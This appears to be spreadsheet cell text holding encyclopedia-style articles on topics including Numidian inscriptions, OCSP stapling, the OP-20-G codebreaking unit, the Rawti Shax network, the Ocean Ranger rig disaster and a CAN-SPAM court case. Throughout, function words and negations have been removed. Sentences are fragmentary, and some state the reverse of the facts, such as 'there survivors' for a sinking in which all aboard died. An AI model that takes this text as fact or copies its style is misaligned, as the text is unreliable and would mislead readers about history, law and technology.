'šy. casters iron: bby. numidian ****n wyfmṭt w*******drš wwdštr *****bn wyfmṭṯ wflw mngy wwrskn kslns wṭmn wrskn nbbn nš[q]rh msdl wnnfsn nb*n nzlh wbll wbby normalization adding known possible vowels aṭeban w-yefmaṭat w-falu****d'rš w-wadaštar zamir w-aṭeban w-yefmaṭat w-falu mangy w-wareskan kslns żaży w-ṭaman w-raskn inababen a-šɣarh masdil w-nanafsen naken w-šy inababen uzzal šufeṭ w-balil fafy w-beby beni fredj inscriptions latin sactut•ihimir f•vixit•anorvm•lxx h[se] latin english sactut ihimir lived years. buried here.] numidian zktt wymr mtyblh mswh mnkdh normalization adding known possible vowels zaktut w-iymir mtyblh amsiweɣ amenkad possible numidian english translation zaktut iyimir mtylbh soldier emperor. also punic-libyan inscription, helped decoding libyco-berber script notes meaning either "the good one" "resting one". references aikhenvald militarev, 1991. 'livijsko-guanchskie jazyki', jazyki azii afriki, vol. 148–266.</t>
  </si>
  <si>
    <t>Nxt</t>
  </si>
  <si>
    <t>open source cryptocurrency payment network launched 2013 anonymous software developer bcnext. uses proof-of-stake reach consensus transactions—as static money supply. unlike bitcoin, mining. specifically conceived flexible platform around build applications financial services, serves basis ardr (ardor), blockchain-as-a-service multi-chain platform developed jelurida, iotex (cryptocurrency) current steward 2021. covered extensively "call evidence" report esma. history created total billion coins. september 2013, bitcointalk.org member bcnext created forum thread announcing proposed launch second generation cryptocurrency asked small bitcoin donations determine distribute initial stake. november 2013, fundraising closed. initial coin offering collected bitcoins worth us$17,000.in july 2016, launched smart transaction templates, meant serve building blocks businesses construct blockchain solutions particular problems. features core infrastructure complex, which, compared leaner simpler bitcoin, creates potential flaws mistakes. however, allows third parties contribute blockchain ease. nxt's asset exchange peer-to-peer exchange allowing decentralized trading shares crypto assets. since blockchain unalterable public ledger transactions, provide trading record items nxt. this, allows designation "coloring" particular coin, builds bridge virtual cryptocurrency world physical world. "colored coin" represent property, stocks/bonds, commodities, even concepts. arbitrary messages used send encrypted plain text well data 1000 bytes data permanently kilobytes data limited amount time). result, used build file-sharing services, decentralized applications, higher-level services. allows holders currency nxt-assets vote cryptographically proven externally verifiable way. this used deciding future development decisions shareholder voting, also applied public elections community-based decision making. plugins allow external developers features usability enhancements. plug-ins contained sandbox. also peer-to-peer computing references external links official website</t>
  </si>
  <si>
    <t>Nyholm Central Guardhouse</t>
  </si>
  <si>
    <t>nyholm central guardhouse historic building holmen copenhagen, denmark. built 1745 part nyholm naval base established reclaimed land site 1690. history first guardhouse nyholm located inside neptune battery (now sixtus battery). when building become outdated grounds restructured, naval secretary frederik danneskiold-samsøe proposed construction building king christian plans approved february 1744 project assigned philip lange served naval master builder almost years also contributed many buildings nyholm, building completed following year. guarded passage custom house nyholm. also used receiving important guests naval base. architecture nyholm central guardhouse built baroque style. typical 18th-century corps garde, open front side provide shelter guards duty.the distinctive feature building large ridge turret. design probably determined need make room clock. engravings show used flag pole projecting vertically crown top. clock manufactured clock-maker peter 1753 personal gift frederick v.due large crown topping turret, building many years colloquially referred "under kronen" (english: "beneath crown"). crown copied thorvald jørgensen design spire present (third) christiansborg palace. however, connection renovation 1934, crowns added original spire christiansborg, making resemblance somewhat less obvious. nyholm central guardhouse today director's office used connection official visits holmen. also used head danish navy operative command. office partly furnished furniture slesvig, former royal ship. also mastekranen references external links</t>
  </si>
  <si>
    <t>OCSP stapling</t>
  </si>
  <si>
    <t>online certificate status protocol (ocsp) stapling, formally known certificate status request extension, standard checking revocation status x.509 digital certificates. allows presenter certificate bear resource cost involved providing online certificate status protocol (ocsp) responses appending ("stapling") time-stamped ocsp response signed initial handshake, eliminating need clients contact improving security performance. motivation original ocsp implementation number issues. firstly, introduce significant cost certificate authorities (ca) requires provide responses every client given certificate real time. example, certificate issued high traffic website, servers likely enormous volumes ocsp requests querying validity certificate.also, ocsp checking potentially impairs users' privacy slows browsing, since requires client contact third party (the confirm validity certificate encounters.moreover, client fails connect ocsp response, forced decide between: continuing connection anyway; defeating purpose ocsp terminating connection based assumption attack; could result excessive false warnings blocks.ocsp stapling aimed addressing issues original ocsp implementation. solution ocsp stapling resolves problems fashion reminiscent kerberos ticket. stapling scenario, certificate holder queries ocsp server regular intervals, obtaining signed time-stamped ocsp response. when site's visitors attempt connect site, response included ("stapled") tls/ssl handshake certificate status request extension response (note: client must explicitly include certificate status request extension clienthello tls/ssl handshake message).while appear allowing site operator control verification responses would allow fraudulent site issue false verification revoked certificate, stapled responses can't forged need directly signed certificate authority, server. client receive stapled response, contact ocsp server itself. however, client receives invalid stapled response, abort connection. increased risk ocsp stapling notification revocation certificate delayed last-signed ocsp response expires. result, clients continue verifiable assurance certificate authority certificate presently valid quite recently), longer need individually contact ocsp server. this means brunt resource burden placed back certificate holder. also means client software longer needs disclose users' browsing habits third party.overall performance also improved: when client fetches ocsp response directly usually involves lookup domain name ca's ocsp server well establishing connection ocsp server. when ocsp stapling used, certificate status information delivered client already established channel, reducing overhead improving performance. specification certificate status request extension specified 6066, section 6961 defines multiple certificate status request extension, allows server send multiple ocsp responses handshake. draft proposal x509v3 extension field, expired april 2013, specified compliant server presenting certificate carrying extension must return valid ocsp token response status_request extension specified client hello. current version proposal extended support additional extensions. developer adam langley discussed extension april 2014 article following repair heartbleed openssl bug. deployment ocsp stapling support progressively implemented. openssl project included support 0.9.8g release assistance grant mozilla foundation. apache http server supports ocsp stapling since version 2.3.3, nginx server since version 1.3.7, litespeed server since version 4.2.4, microsoft's since windows server 2008, haproxy since version 1.5.0, networks big-ip since version 11.6.0, kemp loadmasters since version 7.2.37.1, lighttpd since version 1.4.56.while many servers advertise support ocsp stapling, implementations always reliable. example, apache queries ocsp server, event temporary failure, discard cached good response previous request, start serving response. nginx performs lazy loading ocsp responses, means first requests unable ocsp response.on browser side, ocsp stapling implemented firefox internet explorer since windows vista, google chrome linux, chrome windows since vista.for smtp exim message transfer agent supports ocsp stapling client server modes. limitations ocsp stapling designed reduce cost ocsp validation, client ocsp responder, especially large sites serving many simultaneous users. however, ocsp stapling supports ocsp response time, insufficient certificate chains intermediate certs.this limitation addressed multiple certificate status request extension, specified 6961. adds support sending multiple ocsp responses.tlsv1.3 automatically removes limitation, making browser support 6961 moot, servers drop support 1.2. under stapled response sent server, ocsp response associated end-certificate. under server send multiple ocsp responses, typically certificate certificate chain. references</t>
  </si>
  <si>
    <t>OMI cryptograph</t>
  </si>
  <si>
    <t>cryptograph rotor cipher machine produced sold italian firm ottico meccanica italiana (omi) rome. machine seven rotors, including reflecting rotor. rotors stepped regularly. each rotor could assembled sections different wiring: section consisted "frame" containing ratchet notches, well wiring, section consisted "slug" separate wiring. slug section fitted frame section, different slugs frames could interchanged other. consequence, many permutations rotor selection. machine offered sale 1960s. references cipher deavours louis kruh, "machine cryptography modern cryptanalysis", artech house, 1985, 146–147 bauer, decrypted secrets, edition, springer-verlag, 2000, isbn 3-540-66871-3, 112,136.</t>
  </si>
  <si>
    <t>OP-20-G</t>
  </si>
  <si>
    <t>op-20-g "office chief naval operations (opnav), 20th division office naval communications, section communications security", u.s. navy's signals intelligence cryptanalysis group world mission intercept, decrypt, analyze naval communications japanese, german, italian navies. addition op-20-g also copied diplomatic messages many foreign governments. majority section's effort directed towards japan included breaking early japanese "blue" book fleet code. this made possible intercept high frequency direction finder (hfdf) sites pacific, atlantic, continental u.s., well japanese telegraphic code school radio operators washington, d.c. history code signal section formally made part division naval communications (dnc), op-20-g, july 1922. january 1924, 34-year-old u.s. navy lieutenant named laurance safford assigned expand op-20-g's domain radio interception. worked room 2646, floor navy department building washington, d.c. japan course prime target radio interception cryptanalysis, problem finding personnel could speak japanese. navy number officers served diplomatic capacity japan could speak japanese fluently, shortage radiotelegraph operators could read japanese wabun code communications sent kana. fortunately, number navy marine radiotelegraph operators operating pacific formed informal group 1923 compare notes japanese kana transmissions. four became instructors reading kana transmissions navy began conducting classes subject 1928. classes conducted room 2426 crew, radiotelegraph operators became known "on-the-roof gang". june 1940, op-20-g included officers, enlisted men, civilians, linked network radio listening posts far-flung army's. op-20-g work japanese diplomatic codes, organization's primary focus japanese military codes. navy first handle japanese naval codes 1922, navy agents broke japanese consulate york city, cracked safe, took photographs pages japanese navy codebook, left, everything back found before war, navy cipher bureau operated three main bases: station negat headquarters washington, d.c. station hypo frupac), section pearl harbor hawaii station cast, section fortified caves island corregidor, philippines, codebreakers network listening radio direction finding stations. frumel established melbourne navy signals intelligence personnel philippines evacuated australia. evacuated army signals intelligence personnel went central bureau.the army signal intelligence service (sis) op-20-g hobbled bureaucracy rivalry, competing provide intelligence data, codenamed "magic", high officials. complicating matters coast guard, fbi, even also radio-intercept operations. navy organisation op-20-g conventionally hierarchical army arlington hall went merit rather rank (like bletchley park), though commissions handed "civilians uniform" rank according ensign under, lieutenant lieutenant commander 35). control "regular military types". navy wanted army forbid civilians touch sigaba cipher machine like navy; though developed civilian (william friedman). royal navy visitor intercept specialist commander sandwith reported 1942 "the dislike jews prevalent navy (while) nearly leading army cryptographers jews".so 1940, op-20-g came agreement guide lines handling magic; army responsible even-numbered days navy odd-numbered days. first minute midnight december 1941 navy took over. lt-comdr alwin kramer relief officer (unlike army, dusenbury bratton); night driven around wife. also responsible distributing magic information president; january 1941 army agreed would supply white house january, march, may, july, september november navy february, april, june, august, october december. 1941 magic documents found desk roosevelt's military aide edwin "pa" watson navy took over; army provided magic state department instead.the result much magic delayed unused. there efficient process assessing organizing intelligence, provided postwar single intelligence agency. attack pearl harbor early hours morning december 1941, u.s. navy communications intercept station fort ward bainbridge island, washington, picked radio message sent japanese government japanese embassy washington, d.c. last series messages sent previous hours. messages decrypted purple analogue machine op-20-g passed translation japanese, early morning december army colonel rufus bratton navy lieutenant commander alwin kramer independently inspected decrypts. decrypts instructed japanese ambassador washington inform secretary state, cordell hull, 1:00 washington time negotiations united states japan ended. embassy destroy cipher machines. this sounded like war, although message said nothing specific military action, kramer also realized would rising expanses central western pacific time. tried touch army chief staff general george marshall. after agonizing delays, marshall decrypts methodically examined them. realized importance sent warning field commanders, including major general walter short, army commander hawaii. however, marshall reluctant telephone knew telephone scramblers secure sent less direct channels. various constraints bumblings, short message many hours japanese bombs smashed navy's fleet anchor pearl harbor. after pearl harbor february 1942 power struggles within navy resulted sidelining laurance safford, support admirals ernest king richmond turner (and joseph redman) centralizing control naval intercept codebreaking washington. sections headed john redman (communications combat intelligence section) joseph wenger (communications cryptanalytical section; handle decryption translation). safford shifted administrative support cryptographic research role; sidelined remainder war, ultimately joseph rochefort hawaii.as japanese advances philippines, possibility invasion hawaii, increasing demand intelligence, op-20-g undertook courses action: staff services cast progressively transferred newly formed us-australian-british station, frumel melbourne, australia. another signals intelligence center, known negat formed washington, using elements op-20-g headquarters. naval communications annex summer 1942 navy went motions perhaps co-locating army's commander joseph wenger picked "perfect home" rapidly expanding op-20-g acquired private girls' school mount vernon college women $800,000 fraction buildings grounds worth). february 1943 opened called "naval communications annex", staff moved next months. section evolution (july 1922-march 1935) code signal section (op-20-g), division naval communications (dnc), ocno (july 1922-march 1935). (march 1935-march 1939) communications security group (op-20-g), dnc, ocno (march 1939-september 1939) radio intelligence section (op-20-g), dnc, ocno (october 1939-february 1942) communications security section (op-20-g), dnc, ocno (february 1942-october 1942) radio intelligence section (op-20-g), dnc, ocno (october 1942-july 1946) communications intelligence organization (op-20-g), dnc, ocno july 1946 naval communications intelligence elements collectively designated "communications supplementary activities" 20th division office naval communications, section (op-20-2) also andrew gleason, op-20-g members world fleet radio unit united states naval computing machine laboratory army united states coast guard unit references reading budiansky, stephen (2000). battle wits: complete story codebreaking world york: free press. isbn 0-684-85932-7. clausen, henry (1992). pearl harbour: final judgement. york: crown publishers. isbn 0-517-58644-4. layton, edwin (1985). there: pearl harbour midway breaking secrets. york: william morrow. isbn 0-688-04883-8. external links "the pacific war: u.s. navy, naval intelligence pearl harbor". retrieved 2006-12-07. "the national archives: records national security agency/central security service". retrieved 2006-12-07.</t>
  </si>
  <si>
    <t>Rawti Shax</t>
  </si>
  <si>
    <t>rawti shax didi (kurdish: ڕەوتی شاخ) ("new course" "towards mountain") primarily kurdish dark web-based offshoot jihadist group ansar al-islam. october 2015, seventeen members, including suspected leader, norway-based najmuddin faraj ahmad "mullah krekar" (the original leader ansar al-islam), kurds, arrested indicted coordinated, italy-led multi-nation sweep police across europe. operation dismantled integrated cell italy, norway, united kingdom, germany, finland switzerland.the network accused radicalizing recruiting fighters islamic state iraq levant (isil), plotting attacks targeting norwegian british diplomats middle east, making preparations establish caliphate iraq's kurdistan region. also suspected operating military training camps. italian anti-terrorism chief giuseppe governale said operation "the important international police operation europe years". arrests warrants total seventeen people, iraqi kurds, arrested indicted raids; seven italy, four united kingdom, three norway, finland switzerland. properties searched total, including germany, officials seized electronic devices documents.arrested italy: abdul rahman nauroz, merano, suspected operative leader network, arrested prison, trained least five jihadists travelled syria iraq eldin hodza, merano, kosovar albanian, trained jihadists syria financed italian ringleader 2014 auch mohamad goran fatah, merano, admitted contact indicted, allegedly leadership circle hama mahmood kaml, merano, driver transport company, isil-sympathiser salih abdullah, bolzano, communications italian ringleader ibrahim jamal, bolzano, nicknamed "hitler", fought isil 2012, previously lived england, spread jihadist propaganda talked need terrorist attacks europe european interests well free krekar prison hasan samal jalal, bolzano, suspected ready commit terrorist actsarrested norway: najmuddin faraj ahmad "mullah krekar", suspected leader network, arrested prison, original leader ansar al-islam, allegedly pledged support isil 2014 karim rahim twana, fredrikstad, norwegian citizen, open supporter close associate krekar kamil jalal fatah, drammen, iraqi citizen, visits krekar prison, communications italian ringleaderarrest warrants finland: male, leader finland, joined isil, presumed killed battle december 2014 male, joined isil, presumed killed battle march 2014arrest warrant switzerland: male, joined al-nusra front syria june 2014the network addition believed cells sweden, greece, syria, iran iraq.in march 2016 suspects previously arrested united kingdom released without charges, winning court case extradition italy. extraditions italy several people extradited italy: najmuddin faraj ahmad extradited march 2020. serving prison sentence 2020. 43-year extradited norway october 2020; iraq norwegian citizenship. however, media claimed 2019 norwegian citizenship recalled. references</t>
  </si>
  <si>
    <t>OPROP!</t>
  </si>
  <si>
    <t>oprop! (opraab! correct 1940-danish; transl. proclamation) german airborne propaganda leaflet dropped several danish cities german invasion denmark april 1940. leaflets signed head operation weserübung süd, general leonhard kaupisch. text, written broken understandable danish mixed norwegian, justified german invasion fraternally protecting danish norwegian neutrality british aggression, denounced winston churchill warmonger, exhorted danish populace resist german presence arrangement danish government negotiated. oprop! leaflet notable impact regards danish capitulation. when german infantry arrived amalienborg palace morning april 1940, determined opposition king's royal guard, repelled initial attack, suffering three wounded. this gave christian ministers time confer danish army chief general william wain prior. discussions ongoing, several formations heinkel dornier bombers roared city dropping oprop! leaflets. faced explicit threat luftwaffe bombing civilian population copenhagen, general prior favour continuing fighting, danish government capitulated exchange retaining political independence domestic matters.in 2016 historian hans christian bjerg argued poor broken danish leaflet could rushed translation similar leaflet written germans norway day. reason would operation weserübung initially called invasion norway additional invasion denmark decided late stage planning. references citations sourceskjersgaard, erik (2005). danmark besættelsen danskernes dagligliv 1940-45 danish). politikens forlag. isbn 978-87-567-7853-4.</t>
  </si>
  <si>
    <t>Rasterschlüssel 44</t>
  </si>
  <si>
    <t>rasterschlüssel (abbr. manual cipher system, used german wehrmacht second world war. cipher designed astronomer sometime cryptographer walter fricke working conscript section iib, group okw/chi introduced march 1944 allied forces codebreakers considerable difficulties breaking cryptanalysis, successful, generally required letter crib (known plaintext) weeks, making tactical information outdated could exploited. combination strength ease made ideal hand cipher. design cipher transposition based grille cipher, consisting grid columns rows. each contains randomly placed white cells filled text) black cells. columns labeled shuffled digraphs numbers rows digraphs. sheet also contains letter substitution alphabets encode place names, prior encryption, letter conversion alphabet encode digraphs. text written grid, starting randomly chosen position, row, left right. ciphertext taken column column, following numbering columns. first column taken calculated minutes message time, letter count message text randomly chosen column start cell. message contains start position text grid, designated column header digraphs. digraphs message encoded letter conversion table included message header. secret variable start cell first column ensure unique transposition message, making multiple anagramming difficult. references external links rasterschlüssel cipher machines cryptology rasterschlüssel archived interesting ciphers</t>
  </si>
  <si>
    <t>Real de alerce</t>
  </si>
  <si>
    <t>real alerce real madera (spanish "real fitzroya" "real wood") local currency consisting fitzroya wood used colonial times chiloé archipelago. jesuits, established chiloé since 17th century established fitzroya major export product towards viceroyalty peru. real alerce also used encomenderos taxes. also 1712 huilliche rebellion sources otero, luis. huella fuego, page</t>
  </si>
  <si>
    <t>Ocean Ranger</t>
  </si>
  <si>
    <t>ocean ranger semi-submersible mobile offshore drilling unit sank canadian waters february 1982. drilling exploration well grand banks newfoundland, kilometres (166 east john's, newfoundland, mobil canada, ltd. (mocan) crew members board sank. there survivors. history design ocean ranger designed owned ocean drilling exploration company, inc. (odeco) orleans. vessel self-propelled large semi-submersible design drilling facility living quarters. capable operation beneath 1,500 feet (460 ocean water could drill maximum depth 25,000 feet (7,600 described odeco world's largest semi-submersible date.constructed odeco 1976 mitsubishi heavy industries hiroshima, japan, ocean ranger feet (121 long, feet wide, feet (103 high. twelve 45,000-pound (20,000 anchors. weight 25,000 tons. floating 400-foot (120 long pontoons rested feet surface.the vessel approved 'unrestricted ocean operations' designed withstand extremely harsh conditions sea, including 100-knot (190 km/h) winds 110-foot waves. prior moving grand banks area november 1980, operated coasts alaska, jersey ireland. sinking november 1981, ocean ranger commenced drilling well j-34, third well hibernia field. ocean ranger still working well february 1982 incident occurred. semi-submersible platforms also drilling nearby: sedco 706, miles (13.7 nne, zapata ugland, 19.2 miles (30.9 ocean ranger. february 1982, platforms received reports approaching storm linked major atlantic cyclone nordco ltd, company responsible issuing offshore weather forecasts. usual method preparing weather involved hanging-off drill pipe sub-sea wellhead disconnecting riser sub-sea blowout preventer. surface difficulties speed storm developed, crew ocean ranger forced shear drill pipe hanging-off, disconnected riser early evening. 19:00 local time, nearby sedco experienced large rogue wave damaged items deck caused loss life raft. soon after, radio transmissions heard ocean ranger, describing broken portlight porthole window) water ballast control room, discussions best repair damage. ocean ranger reported experiencing storm seas feet wave feet thus leaving unprotected portlight feet (8.5 water line vulnerable wave damage. some time 21:00, radio conversations originating ocean ranger heard sedco zapata ugland, noting valves ocean ranger's ballast control panel appeared opening closing accord. radio conversations also discussed 100-knot (190 km/h) winds waves feet high. through remainder evening, routine radio traffic passed ocean ranger, neighboring rigs individual support boats. nothing ordinary noted. 00:52 local time, february, mayday call sent ocean ranger, noting severe list port side requesting immediate assistance. this first communication ocean ranger identifying major problem. standby vessel, seaforth highlander, requested come close countermeasures 10–15-degree list proving ineffective. onshore mocan supervisor notified situation, canadian forces mobil-operated helicopters alerted 01:00 local time. boltentor nordertor, standby boats sedco zapata ugland respectively, also dispatched ocean ranger provide assistance. 01:30 local time, ocean ranger transmitted last message: "there radio communications ocean ranger. going lifeboat stations." shortly thereafter, middle night midst severe winter weather, crew abandoned platform. platform remained afloat another ninety minutes, sinking 03:07 03:13 local time. ocean ranger sank beneath atlantic: next morning remained buoys. entire complement workers mobil employees contractors various service companies killed. while provided emergency procedures manual detailed evacuation procedures, unclear effectively platform evacuation carried out. there evidence least lifeboat successfully launched crew inside, witnesses seaforth highlander reported seeing least crew members water time, indicating least crew successfully evacuated rig. united states coast guard report speculated 'these either chose enter water directly thrown water result unsuccessful lifesaving equipment launching'. rescue attempts standby vessels hampered adverse weather conditions conclusion standby boats neither equipped configured rescue casualties cold sea. result severe weather, first helicopter arrive scene 02:30 local time, time ocean ranger's crew succumbed hypothermia drowned. over next week, bodies recovered north atlantic. autopsies indicated died result drowning hypothermic state. related activity following day, soviet container ship mekhanik tarasov struck weather conditions ocean ranger, approximately miles (105 east. battered soviet freighter listed dramatically hours sinking loss crew. causes effects remains platform found sonar search following weeks, resting inverted position approximately feet (148 south-east wellhead, surrounded major items debris derrick. platform capsized bow-first, turning striking floor forward ends platform's pontoons. united states coast guard marine board investigation report disaster summarised chain events follows: large wave appeared cause broken portlight; broken portlight allowed ingress water ballast control room; ballast control panel malfunctioned appeared malfunction crew; result malfunction perceived malfunction, several valves platform's ballast control system opened short circuit, manually opened crew; ocean ranger assumed forward list; result forward list, boarding seas began flooding forward chain lockers located forward corner support columns; forward list worsened; pumping forward tanks possible using usual ballast control method magnitude forward list created vertical distance forward tanks ballast pumps located astern exceeded suction available ballast system's pumps; detailed instructions personnel trained ballast control panel available; point, crew blindly attempted manually operate ballast control panel using brass control rods; point, manually operated valves pontoons closed; progressive flooding chain lockers subsequent flooding upper deck resulted loss buoyancy great enough cause platform capsize. canadian royal commission spent years looking disaster. joint federal-provincial royal commission ocean ranger marine disaster found crew trained, safety equipment inadequate, safety protocols supply ship, platform number flaws. royal commission concluded ocean ranger design construction flaws, particularly ballast control room, crew lacked proper safety training, survival suits equipment. royal commission also concluded inspection regulation united states canadian government agencies ineffective. addition recommendations canada's offshore industry, commission recommended federal government invest annually research development search rescue technologies, improving design lifesaving equipment—a commitment every fiscal year since 1982. aftermath august 1983, wreck ocean ranger refloated sunk deeper waters dutch firm wijsmuller salvage. since sinking previous year, concerns wreck's position made federal government. wreck ocean ranger situated approximate metres water, wreck posed danger shipping. operation ocean ranger towed upside pontoons breaking surface.operations commenced earlier june. however progress halted salvage divers killed wreck underwater explosion june. stop-work order refloating wreck declared investigation incident followed. however, exploratory diving allowed continue. second incident june third diver killed, believed dropped object attempted return surface.lawsuits arising sinking settled court package cumulatively valued million.a permanent monument died created grounds confederation building, seat provincial government newfoundland.a documentary film, ocean ranger disaster (2002), released canada. fiction, canadian author lisa moore's novel, february (2009), depicts life woman whose husband died aboard rig. canadian folk singer-songwriter hynes wrote song called "atlantic blue" (1988) tribute crew ocean ranger.in january 2012, non-fiction book, ocean ranger: remaking promise published canada fernwood publishing. book's author, susan dodd, lost older brother sinking ocean ranger watched, years, parents pursued legal struggles companies. references further reading report royal commission (canada) ocean ranger marine disaster (report). ottawa: canadian government publishing centre. 1984. oclc 607866939. marine casualty report: mobile offshore drilling unit (modu) ocean ranger, o.n. 615641, capsizing sinking atlantic ocean, february 1982 multiple loss life (pdf) (report). washington, d.c.: u.s. coast guard. 1983. heffernan, mike (2009). rig: oral history ocean ranger disaster. creative publ. isbn 978-1-897174-41-8., illustrated collection first-person accounts former workers, victims' families, government officials, media, search rescue crews. susan dodd (2012) ocean ranger: remaking promise oil, fernwood: halifax. isbn 978-1552664643 external links digital archives ocean ranger disaster report royal commission disaster, library archives canada</t>
  </si>
  <si>
    <t>Offline root certificate authority</t>
  </si>
  <si>
    <t>offline root certificate authority certificate authority defined x.509 standard 5280) isolated network access, often kept powered-down state. public infrastructure, chain trusted authorities begins root certificate authority (root ca). once root installed root certificate created, next action taken administrator root issue certificates authorizing intermediate subordinate) cas. this creates ability issue, distribute revoke digital certificates without direct action root because consequences compromised root great including need re-issue every certificate pki), root must kept safe unauthorized access. common method ensure security integrity root keep offline state. brought online needed specific, infrequent tasks, typically limited issuance re-issuance certificates authorizing intermediate cas. drawback offline operation hosting certificate revocation list root possible unable respond requests protocols http, ldap ocsp). however, possible move certificate validation functionality dedicated validation authority authorized offline root better understand offline root greatly improve security integrity pki, important realize specific issued certificates list. therefore, (root intermediate) responsible tracking revocation certificates alone issued. consider scenario root issues certificates three intermediate cas: root issued total three certificates.the newly created intermediate issue certificates: intermediate issues 10,000 certificates intermediate issues 20,000 certificates intermediate issues 30,000 certificatesif intermediate revoke certificates issue maximum size specific intermediate would intermediate "a": 10,000 entries intermediate "b": 20,000 entries intermediate "c": 30,000 entrieshowever, root issued three certificates intermediate cas), maximum size root entriestherefore, overall burden maintaining hosting specific root minimized intermediate cas, well burden maintaining associated validation authority. also x.509 certificate server extended validation certificate intermediate certificate authority validation authority ceremony online certificate status protocol certificate revocation list self-signed certificate trust references</t>
  </si>
  <si>
    <t>Omega World Travel, Inc. v. Mummagraphics, Inc.</t>
  </si>
  <si>
    <t>omega world travel, inc. mummagraphics, inc., f.3d (4th cir. 2006), case united states court appeals fourth circuit mummagraphics, inc. sued omega world travel, inc. (omega) cruise.com fully owned subsidiary omega) mummagraphic alleged received commercial e-mail messages violation controlling assault non-solicited pornography marketing (can-spam) 2003 well oklahoma state law. initial filing, united states district court eastern district virginia awarded summary judgment omega mummagraphics' claims finding commercial emails omega violate can-spam act, can-spam preempted oklahoma state law. court appeals affirmed. parties appellant (original plaintiff) mummagraphics, inc., oklahoma corporation place operation oklahoma city. provided based services hosted websites devoted opposing spam messages. these websites included sueaspammer.com optoutbydomain.com. president mark mumma.the appellees (original defendant) included omega world travel, inc. cruise.com. cruise.com operator website sold cruise vacations. sent email advertisements, also known "e-deals," prospective customers. background cruise.com sent e-mails containing travel offers inbox@webguy.net, email address operated mummagraphics. each message contained link recipient could click order removed future mailings, message also stated recipient could opt-out future e-mails writing postal address provided e-mail address. each message also contained link cruise.com website toll-free phone number company.mummagraphics claimed cruise.com e-mail messages contained several inaccuracies. first, message stated recipient signed cruise.com mailing list, asked inbox@webguy.net receive company's offers. second, message listed cruise.com sending organization, also included address "fl-broadcast.net" (not domain name linked cruise.com) header information. addition, messages' "from" field listed cruisedeals@cruise.com, email address cruise.com stopped using.upon receiving cruise.com emails, mumma opt-out link remove email address cruise.com email list. instead, mumma called omega's general counsel complained asked receive email messages. also refused email opt-out mechanisms, instead threatened violations oklahoma law. omega asked mumma email address receiving e-mail messages, mumma give them. instead, asked omega remove future mailings every address containing domain names listed mummagraphics' optoutbydomain.com website. omega indicated would later realized removing addresses required considerable effort. immediately remove addresses.a later, mummagraphics received another email message inbox@webguy.net. sent letter omega stating received multiple unsolicited email messages cruise.com. specify email address messages received. letter claimed messages violated federal state laws said mummagraphics intended least $150,000 statutory damages unless settled matter $6,250. also attached cruise.com emails letter. email attachments, omega able figure email address mummagraphics receiving cruise.com commercial emails removed cruise.com mailing list.when omega refused demanded settlement money, mummagraphics accused omega cruise.com "spammers" "anti-spam" websites. also posted pictures omega cruise.com executives, taken respective websites, "anti-spam" sites. basis postings, omega cruise.com sued mummagraphics claiming defamation, copyright infringement, trademark infringement, unauthorized likeness. mummagraphics raised counterclaims can-spam oklahoma (these claims pending front fourth circuit). alleged cruise.com e-mails contained actionable inaccuracies failed comply opt-out provisions. district court held can-spam preempted mummagraphics' claims oklahoma's statutes. held cruise.com violated can-spam email inaccuracies substantial opt-out provisions violated. mummagraphics appealed. prior history district court awarded summary judgment omega mummagraphic's claims grounds can-spam preempted mummagraphic's claims oklahoma's statutes. addition, mummagraphics failed allege material inaccuracies pattern failure conform opt-out requirements necessary establish liability can-spam act. fourth circuit court appeals mummagraphics' claims oklahoma state fourth circuit upheld district court holding oklahoma could cover emails can-spam preempted state regard immaterial misrepresentation. court reasoned can-spam act's exceptions allow states punish "falsity deception," immaterial representation falls outside meaning terms. thus, according court, can-spam implicitly prevented states punishing immaterial misrepresentations like ones here. mummagraphics argued entitled damages provisions oklahoma provide "[i]t shall unlawful person initiate electronic email message sender knows, reasons know misrepresents information identifying point origin transmission path electronic mail message; contain information identifying point origin transmission path electronic mail message; contains false, malicious misleading information purposefully negligently injures person."the district court held provisions oklahoma statute preempted can-spam insofar applied immaterial misrepresentations. misrepresentations case immaterial, mummagraphics entitled damages oklahoma statutory claims. upon appeal, mummagraphics argued can-spam permits states "prohibit[] falsity deception" (under u.s.c. 7707(b)(1)), district court incorrect hold oklahoma state could cover immaterial misrepresentations. fourth circuit agreed district court finding although terms oklahoma state limited material misrepresentations, preempted can-spam case immaterial misrepresentations. this can-spam exception allows states punish "falsity deception" commercial emails. court held although terms "falsity deception" defined can-spam act, common meaning words indicates can-spam exception applicable material misrepresentation. court explained "deception" requires bare error. while "falsity" defined true also conveys sense tortiousness wrongfulness. word "falsity" read combination "deception" indicates traditionally tortious wrongful conduct. thus, congress would intended "falsity" mean simply error. adopting meaning would also defeat purpose can-spam ensure careful balance preserving potentially useful commercial tool (electronic communication) preventing abuse. according court, mummagraphics' reading "falsity deception" exception would permit exception swallow whole rule, giving states power intended undermining regulatory balance congress established. accordingly, mummagraphics' broad reading exception compatible structure can-spam whole.thus, mummagraphics' claims oklahoma state failed. mummagraphics' claims can-spam mummagraphics argued cruise.com violated can-spam putting inaccurate header information commercial emails. court noted can-spam provided u.s.c. 7704(a)(1) "[i]t unlawful person initial transmission, computer commercial electronic message contains, accompanied header information materially misleading." explains "materially" used connection false misleading header information, includes "alteration concealment header information manner would impair ability identify, locate, respond person initiated electronic mail message investigate alleged violation, ability recipient message respond person initiated electronic message."15 u.s.c. 7704(a)(6) mummagraphics alleged cruise.com emails violated provision can-spam emails' header incorrectly indicated emails sent "fl-broadcast.net" also emails' "from" address indicated email address non-functional. court rejected claims, finding alleged misrepresentations "materially false misleading" view can-spam act. court noticed purpose cruise.com emails encourage recipients contact cruise.com book cruises emails advertised. purpose, cruise.com emails, even though contained incorrect information headers, otherwise full ways "identify, locate respond sender" "investigate [an] alleges violation" can-spam act. u.s.c. 7704(a)(1). example, email link cruise.com website toll free contact number call. because emails contained accurate identifiers sender, inaccuracies header could impaired efforts recipient, enforcement organization, party raising can-spam claim find company. court also rejected mummagraphics' claim alleged violation can-spam act's e-mail removal provisions. u.s.c. 7704(a)(3), requires commercial emails include functioning return electronic mail address form internet-based mechanism recipient submit internet based communication requesting receive future commercial electronic mail messages." also requires u.s.c. 7704(a)(4)(a) senders commercial emails honor requests removal made mechanisms within business days. addition, u.s.c. 7706(g)(1) also permits internet access service providers bring suit provisions pattern practice" violates requirements. court held mummagraphics' sole allegation appellees failed remove inbox@webguy.net ′′e-deals′′ mailing list within days mark mumma's call omega's general counsel satisfy standard pattern practice." thus, mummagraphics' claims can-spam failed too. mummagraphics' tort claims oklahoma state with regards mummagraphics' tort claim asserting cruise.com's emails amounted trespass chattels oklahoma state law, court held district court correctly granted summary judgment claim mummagraphics' offered 